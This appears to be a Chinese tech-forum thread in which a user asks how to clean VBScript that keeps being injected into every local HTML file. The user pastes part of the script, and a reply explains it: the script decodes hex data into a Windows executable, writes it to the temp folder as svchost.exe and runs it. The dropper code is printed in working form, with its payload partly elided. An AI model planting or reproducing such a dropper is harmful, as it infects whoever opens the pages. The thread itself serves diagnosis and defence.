是这样的，我本地的 html 文件全部被写入了一大推 VBScript 代码，新建的 html 过不了一会儿也会中招，我想问问不重装系统的话能解决么？(貌似只重装系统也没用)

This topic created in 3794 days ago, the information mentioned may be changed or developed.

贴上一部分代码，因为那代码实在太长了

<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000......中间省略......5737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C467265650000004578697450726F636573730000004472616746696E697368000057696E48656C705700000000000000000000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath

14 replies • 2016-01-16 10:30:57 +08:00

vmebeh

Jan 3, 2016

4D5A
M Z
WriteData 的内容是 Windows 可执行文件

GetSpecialFolder
https://msdn.microsoft.com/en-us/library/a72y2t1c(v=vs.84).aspx

把 WriteData 写到 %temp%\svchost.exe 然后执行